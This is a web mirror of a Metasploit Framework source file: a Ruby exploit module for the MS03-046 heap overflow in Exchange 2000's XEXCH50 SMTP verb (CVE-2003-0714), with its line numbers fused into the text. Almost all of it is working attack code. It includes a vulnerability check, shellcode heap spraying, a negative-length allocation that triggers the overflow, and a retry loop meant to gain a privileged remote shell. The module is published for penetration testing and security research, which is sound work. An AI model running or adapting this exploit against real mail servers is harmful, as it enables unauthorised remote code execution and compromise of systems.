CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',13'Description' => %q{14This is an exploit for the Exchange 2000 heap overflow. Due15to the nature of the vulnerability, this exploit is not very16reliable. This module has been tested against Exchange 200017SP0 and SP3 running a Windows 2000 system patched to SP4. It18normally takes between one and 100 connection attempts to19successfully obtain a shell. This exploit is *very* unreliable.20},21'Author' =>22[23'hdm', # original module24'aushack', # msf3 port :)25],26'References' =>27[28[ 'CVE', '2003-0714' ],29[ 'BID', '8838' ],30[ 'OSVDB', '2674' ],31[ 'MSB', 'MS03-046' ],32[ 'EDB', '113' ],33],34'DefaultOptions' =>35{36'EXITFUNC' => 'seh',37},38'Platform' => 'win',39'Privileged' => true,40'Payload' =>41{42'Space' => 1024,43'BadChars' => "\x00\x0a\x0d\x20:=+\x22",44'StackAdjustment' => -3500,45},46'Targets' =>47[48[ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ],49],50'DefaultTarget' => 0,51'DisclosureDate' => '2003-10-15'))5253register_options(54[55Opt::RPORT(25),56OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', '[email protected]']),57OptString.new('MAILTO', [ true, 'The TO address of the e-mail', 'administrator']),58OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]),59])60end6162def check63connect64banner = sock.get_once || ''6566if (banner !~ /Microsoft/)67print_status("Target does not appear to be an Exchange server.")68return Exploit::CheckCode::Safe69end7071sock.put("EHLO #{Rex::Text.rand_text_alpha(1)}\r\n")72res = sock.get_once || ''73if (res !~ /XEXCH50/)74print_status("Target does not appear to be an Exchange server.")75return Exploit::CheckCode::Safe76end77sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")78res = sock.get_once || ''7980if (res =~ /Sender OK/)81sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")82res = sock.get_once || ''83if (res =~ /250/)84sock.put("XEXCH50 2 2\r\n")85res = sock.get_once || ''86if (res !~ /Send binary data/)87print_error("Target has been patched!")88return Exploit::CheckCode::Detected89else90return Exploit::CheckCode::Appears91end92end93end9495disconnect96end9798def smtp_setup(count)99print_status("Exploit attempt ##{count}")100101connect102select(nil,nil,nil,1)103banner = sock.get_once || ''104print_status("Connected to SMTP server: #{banner.to_s}")105106if (banner !~ /Microsoft/)107print_status("Target does not appear to be running Exchange.")108return109end110111select(nil,nil,nil,5)112sock.put("EHLO X\r\n")113select(nil,nil,nil,7)114res = sock.get_once || ''115116if (res !~ /XEXCH50/)117print_status("Target is not running Exchange.")118return119end120121sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")122select(nil,nil,nil,3)123124sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")125select(nil,nil,nil,3)126127end128129def exploit130bufflen = target['BuffLen']131print_status("Trying to exploit #{target.name} with address 0x%.8x..." % target['Ret'])132count = 1 # broke133134begin135if (count > datastore['ATTEMPTS'])136print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.")137return # Stop after a specified number of attempts.138end139140if (session_created?)141return # Stop the attack. Non-session payloads will continue regardless up to ATTEMPTS.142end143144while(true)145if (smtp_setup(count))146print_status("Connection 1: ")147end148149sock.put("XEXCH50 2 2\r\n")150select(nil,nil,nil,3)151res = sock.get_once152print_status("#{res}")153if (res !~ /Send binary data/)154print_status("Target is not vulnerable.")155return # commented out for the moment156end157158sock.put("XX")159160print_status("ALLOC")161162size = 1024 * 1024 * 32163164sock.put("XEXCH50 #{size} 2\r\n")165select(nil,nil,nil,3)166167sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"168169print_status("Uploading shellcode to remote heap.")170171if (sock.put(sploit))172print_status("\tOK.")173end174175print_status("Connection 2: ")176smtp_setup(count) # Connection 2177178sock.put("XEXCH50 -1 2\r\n") # Allocate negative value179select(nil,nil,nil,2)180res = sock.get_once || ''181182if (!res)183print_error("Error - no response")184end185186print_status("OK")187188bufflen += target['Offset2']189190if (bufflen > target['Offset1'])191bufflen = target['BuffLen']192end193194heapover = [target['Ret']].pack('V') * bufflen195print_status("Overwriting heap with payload jump (#{bufflen})")196sock.put(heapover)197198print_status("Starting reconnect sequences...")19920010.times do |x|201print_status("Connect #{x}")202connect203sock.put("HELO X\r\n")204disconnect205end206end207208rescue209print_status("Unable to connect or Exchange has crashed... Retrying.")210count += 1211retry212end213214disconnect215end216end217218219